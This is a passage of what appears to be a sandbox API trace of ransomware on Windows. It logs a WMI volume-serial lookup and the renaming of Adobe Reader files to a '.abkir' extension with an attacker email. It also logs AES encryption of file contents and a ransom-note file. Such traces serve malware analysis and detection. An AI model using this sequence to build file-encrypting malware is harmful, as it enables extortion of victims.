out: puCount=0x8f6ee6c*=0x0) returned 0x0 [0198.984] WbemDefPath:IWbemPath:GetText (in: This=0x60313c0, lFlags=2, puBuffLength=0x8f6ee68*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee68*=0x20, pszText=0x0) returned 0x0 [0198.984] WbemDefPath:IWbemPath:GetText (in: This=0x60313c0, lFlags=2, puBuffLength=0x8f6ee68*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee68*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0198.984] CoGetContextToken (in: pToken=0x8f6ead8 | out: pToken=0x8f6ead8) returned 0x0 [0198.984] WbemLocator:IUnknown:AddRef (This=0xb5b424) returned 0x3 [0198.984] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e96c | out: ppvObject=0x8f6e96c*=0xb5b424) returned 0x0 [0198.984] WbemLocator:IUnknown:Release (This=0xb5b424) returned 0x3 [0198.984] WbemLocator:IUnknown:Release (This=0xb5b424) returned 0x2 [0198.984] WbemDefPath:IWbemPath:GetText (in: This=0x60313c0, lFlags=2, puBuffLength=0x8f6ee70*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee70*=0x20, pszText=0x0) returned 0x0 [0198.984] WbemDefPath:IWbemPath:GetText (in: This=0x60313c0, lFlags=2, puBuffLength=0x8f6ee70*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee70*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0198.984] IWbemServices:GetObject (in: This=0x60334d4, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x8f6ee24*=0x0, ppCallResult=0x0 | out: ppObject=0x8f6ee24*=0x6027b20, ppCallResult=0x0) returned 0x0 [0199.222] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031430, puCount=0x8f6ee24 | out: puCount=0x8f6ee24*=0x2) returned 0x0 [0199.222] WbemDefPath:IWbemPath:GetText (in: This=0x6031430, lFlags=4, puBuffLength=0x8f6ee20*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee20*=0xf, pszText=0x0) returned 0x0 [0199.222] WbemDefPath:IWbemPath:GetText (in: This=0x6031430, lFlags=4, puBuffLength=0x8f6ee20*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ee20*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0199.222] IWbemClassObject:Get (in: This=0x6027b20, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36541c0*=0, plFlavor=0x36541c4*=0 | out: pVal=0x8f6ee20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36541c0*=8, plFlavor=0x36541c4*=0) returned 0x0 [0199.222] SysStringByteLen (bstr="9C354B42") returned 0x10 [0199.222] SysStringByteLen (bstr="9C354B42") returned 0x10 [0199.222] IWbemClassObject:Get (in: This=0x6027b20, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36541c0*=8, plFlavor=0x36541c4*=0 | out: pVal=0x8f6ee28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36541c0*=8, plFlavor=0x36541c4*=0) returned 0x0 [0199.222] SysStringByteLen (bstr="9C354B42") returned 0x10 [0199.223] SysStringByteLen (bstr="9C354B42") returned 0x10 [0199.223] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHRV.htm", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHRV.htm", lpFilePart=0x0) returned 0x36 [0199.223] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHRV.htm.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHRV.htm.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x59 [0199.223] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee88) returned 1 [0199.223] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHRV.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmehrv.htm"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef04 | out: lpFileInformation=0x8f6ef04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80861b40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x2ff8a620, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0199.223] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee84) returned 1 [0199.223] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHRV.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmehrv.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHRV.htm.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmehrv.htm.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0199.224] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHUN.htm", nBufferLength=0x105, lpBuffer=0x8f6ea40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHUN.htm", lpFilePart=0x0) returned 0x36 [0199.224] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0199.224] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eea8) returned 1 [0199.224] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef24 | out: lpFileInformation=0x8f6ef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x129dd140, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x129dd140, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x12b0dc40, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0199.224] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eea4) returned 1 [0199.224] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHUN.htm", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHUN.htm", lpFilePart=0x0) returned 0x36 [0199.224] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eef4) returned 1 [0199.225] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHUN.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmehun.htm"), fInfoLevelId=0x0, lpFileInformation=0x36546fc | out: lpFileInformation=0x36546fc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4274)) returned 1 [0199.225] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eef0) returned 1 [0199.225] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHUN.htm", nBufferLength=0x105, lpBuffer=0x8f6e934, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHUN.htm", lpFilePart=0x0) returned 0x36 [0199.225] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee28) returned 1 [0199.225] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHUN.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmehun.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4e0 [0199.225] GetFileType (hFile=0x4e0) returned 0x1 [0199.225] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee24) returned 1 [0199.225] GetFileType (hFile=0x4e0) returned 0x1 [0199.225] GetFileSize (in: hFile=0x4e0, lpFileSizeHigh=0x8f6ef30 | out: lpFileSizeHigh=0x8f6ef30*=0x0) returned 0x4274 [0199.226] ReadFile (in: hFile=0x4e0, lpBuffer=0x3746f38, nNumberOfBytesToRead=0x4274, lpNumberOfBytesRead=0x8f6eedc, lpOverlapped=0x0 | out: lpBuffer=0x3746f38*, lpNumberOfBytesRead=0x8f6eedc*=0x4274, lpOverlapped=0x0) returned 1 [0199.773] CloseHandle (hObject=0x4e0) returned 1 [0199.773] CryptAcquireContextW (in: phProv=0x8f6ee7c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8f6ee7c*=0x66bbb70) returned 1 [0199.774] CryptGenRandom (in: hProv=0x66bbb70, dwLen=0x10, pbBuffer=0x3667530 | out: pbBuffer=0x3667530) returned 1 [0199.887] CryptImportKey (in: hProv=0x66bbb70, pbData=0x3770c6c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x8f6ee4c | out: phKey=0x8f6ee4c*=0xb7f690) returned 1 [0199.887] CryptContextAddRef (hProv=0x66bbb70, pdwReserved=0x0, dwFlags=0x0) returned 1 [0199.887] CryptContextAddRef (hProv=0x66bbb70, pdwReserved=0x0, dwFlags=0x0) returned 1 [0199.887] CryptDuplicateKey (in: hKey=0xb7f690, pdwReserved=0x0, dwFlags=0x0, phKey=0x8f6ee3c | out: phKey=0x8f6ee3c*=0xb7f850) returned 1 [0199.887] CryptContextAddRef (hProv=0x66bbb70, pdwReserved=0x0, dwFlags=0x0) returned 1 [0199.887] CryptSetKeyParam (hKey=0xb7f850, dwParam=0x4, pbData=0x3770d4c*=0x1, dwFlags=0x0) returned 1 [0199.888] CryptSetKeyParam (hKey=0xb7f850, dwParam=0x1, pbData=0x3770d18, dwFlags=0x0) returned 1 [0199.888] CryptEncrypt (in: hKey=0xb7f850, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3770d5c*, pdwDataLen=0x8f6eea8*=0x4280, dwBufLen=0x4280 | out: pbData=0x3770d5c*, pdwDataLen=0x8f6eea8*=0x4280) returned 1 [0199.888] CryptEncrypt (in: hKey=0xb7f850, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3775000*, pdwDataLen=0x8f6eeb0*=0x0, dwBufLen=0x10 | out: pbData=0x3775000*, pdwDataLen=0x8f6eeb0*=0x10) returned 1 [0199.889] CryptDestroyKey (hKey=0xb7f690) returned 1 [0199.889] CryptReleaseContext (hProv=0x66bbb70, dwFlags=0x0) returned 1 [0199.890] CryptReleaseContext (hProv=0x66bbb70, dwFlags=0x0) returned 1 [0199.890] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHUN.htm", nBufferLength=0x105, lpBuffer=0x8f6e920, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHUN.htm", lpFilePart=0x0) returned 0x36 [0199.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee14) returned 1 [0199.890] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHUN.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmehun.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4e0 [0199.891] GetFileType (hFile=0x4e0) returned 0x1 [0199.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee10) returned 1 [0199.891] GetFileType (hFile=0x4e0) returned 0x1 [0199.891] WriteFile (in: hFile=0x4e0, lpBuffer=0x3775608*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x8f6eea4, lpOverlapped=0x0 | out: lpBuffer=0x3775608*, lpNumberOfBytesWritten=0x8f6eea4*=0x20, lpOverlapped=0x0) returned 1 [0199.892] CloseHandle (hObject=0x4e0) returned 1 [0199.892] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0199.892] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0199.892] CoTaskMemFree (pv=0xbed438) [0199.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x8f6e908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0199.892] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ee50 | out: ppv=0x8f6ee50*=0xb51e34) returned 0x0 [0199.892] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ee48 | out: pAptType=0x8f6ee48*=1) returned 0x0 [0199.893] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ee4c | out: ppvObject=0x8f6ee4c*=0x0) returned 0x80004002 [0199.893] IUnknown:Release (This=0xb51e34) returned 0x1 [0199.893] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e7b8 | out: ppv=0x8f6e7b8*=0x6027190) returned 0x0 [0199.894] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027190, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e9d0 | out: ppvObject=0x8f6e9d0*=0x0) returned 0x80004002 [0199.894] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027190, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e9e4 | out: ppvObject=0x8f6e9e4*=0x6029f10) returned 0x0 [0199.894] WbemDefPath:IUnknown:Release (This=0x6027190) returned 0x0 [0199.894] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f10, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e604 | out: ppvObject=0x8f6e604*=0x6029f10) returned 0x0 [0199.894] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f10, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e5c0 | out: ppvObject=0x8f6e5c0*=0x0) returned 0x80004002 [0199.894] WbemDefPath:IUnknown:AddRef (This=0x6029f10) returned 0x3 [0199.894] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f10, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6df1c | out: ppvObject=0x8f6df1c*=0x0) returned 0x80004002 [0199.894] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f10, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6decc | out: ppvObject=0x8f6decc*=0x0) returned 0x80004002 [0199.894] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f10, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ded8 | out: ppvObject=0x8f6ded8*=0xbe2570) returned 0x0 [0199.894] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe2570, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6dee0 | out: pCid=0x8f6dee0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0199.894] WbemDefPath:IUnknown:Release (This=0xbe2570) returned 0x3 [0199.894] CoGetContextToken (in: pToken=0x8f6df38 | out: pToken=0x8f6df38) returned 0x0 [0199.894] CoGetContextToken (in: pToken=0x8f6e340 | out: pToken=0x8f6e340) returned 0x0 [0199.894] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f10, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e3d0 | out: ppvObject=0x8f6e3d0*=0x0) returned 0x80004002 [0199.895] WbemDefPath:IUnknown:Release (This=0x6029f10) returned 0x2 [0199.895] WbemDefPath:IUnknown:Release (This=0x6029f10) returned 0x1 [0199.895] CoGetContextToken (in: pToken=0x8f6ecc8 | out: pToken=0x8f6ecc8) returned 0x0 [0199.895] CoGetContextToken (in: pToken=0x8f6ec28 | out: pToken=0x8f6ec28) returned 0x0 [0199.895] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f10, riid=0x8f6ecf8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ecf4 | out: ppvObject=0x8f6ecf4*=0x6029f10) returned 0x0 [0199.895] WbemDefPath:IUnknown:AddRef (This=0x6029f10) returned 0x3 [0199.895] WbemDefPath:IUnknown:Release (This=0x6029f10) returned 0x2 [0199.895] WbemDefPath:IWbemPath:SetText (This=0x6029f10, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0199.895] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029f10, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0199.895] WbemDefPath:IWbemPath:GetText (in: This=0x6029f10, lFlags=2, puBuffLength=0x8f6ee78*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee78*=0x20, pszText=0x0) returned 0x0 [0199.895] WbemDefPath:IWbemPath:GetText (in: This=0x6029f10, lFlags=2, puBuffLength=0x8f6ee78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0199.895] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029f10, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0199.895] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029f10, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0199.895] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029f10, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0199.895] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029f10, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0199.895] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029f10, puCount=0x8f6edfc | out: puCount=0x8f6edfc*=0x0) returned 0x0 [0199.895] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x8f6ede8 | out: puCount=0x8f6ede8*=0x2) returned 0x0 [0199.895] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ede4*=0xf, pszText=0x0) returned 0x0 [0199.895] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ede4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0199.895] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ed98 | out: ppv=0x8f6ed98*=0xb51e34) returned 0x0 [0199.895] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ed90 | out: pAptType=0x8f6ed90*=1) returned 0x0 [0199.895] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ed94 | out: ppvObject=0x8f6ed94*=0x0) returned 0x80004002 [0199.895] IUnknown:Release (This=0xb51e34) returned 0x1 [0199.896] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e700 | out: ppv=0x8f6e700*=0x60271a0) returned 0x0 [0199.896] WbemDefPath:IUnknown:QueryInterface (in: This=0x60271a0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e918 | out: ppvObject=0x8f6e918*=0x0) returned 0x80004002 [0199.896] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60271a0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e92c | out: ppvObject=0x8f6e92c*=0x6029f80) returned 0x0 [0199.897] WbemDefPath:IUnknown:Release (This=0x60271a0) returned 0x0 [0199.897] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f80, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e54c | out: ppvObject=0x8f6e54c*=0x6029f80) returned 0x0 [0199.897] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f80, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e508 | out: ppvObject=0x8f6e508*=0x0) returned 0x80004002 [0199.897] WbemDefPath:IUnknown:AddRef (This=0x6029f80) returned 0x3 [0199.897] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f80, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6de64 | out: ppvObject=0x8f6de64*=0x0) returned 0x80004002 [0199.897] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f80, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6de14 | out: ppvObject=0x8f6de14*=0x0) returned 0x80004002 [0199.897] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f80, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6de20 | out: ppvObject=0x8f6de20*=0xbe25f0) returned 0x0 [0199.897] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe25f0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6de28 | out: pCid=0x8f6de28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0199.897] WbemDefPath:IUnknown:Release (This=0xbe25f0) returned 0x3 [0199.897] CoGetContextToken (in: pToken=0x8f6de80 | out: pToken=0x8f6de80) returned 0x0 [0199.897] CoGetContextToken (in: pToken=0x8f6e288 | out: pToken=0x8f6e288) returned 0x0 [0199.897] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f80, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e318 | out: ppvObject=0x8f6e318*=0x0) returned 0x80004002 [0199.897] WbemDefPath:IUnknown:Release (This=0x6029f80) returned 0x2 [0199.897] WbemDefPath:IUnknown:Release (This=0x6029f80) returned 0x1 [0199.897] CoGetContextToken (in: pToken=0x8f6ec10 | out: pToken=0x8f6ec10) returned 0x0 [0199.897] 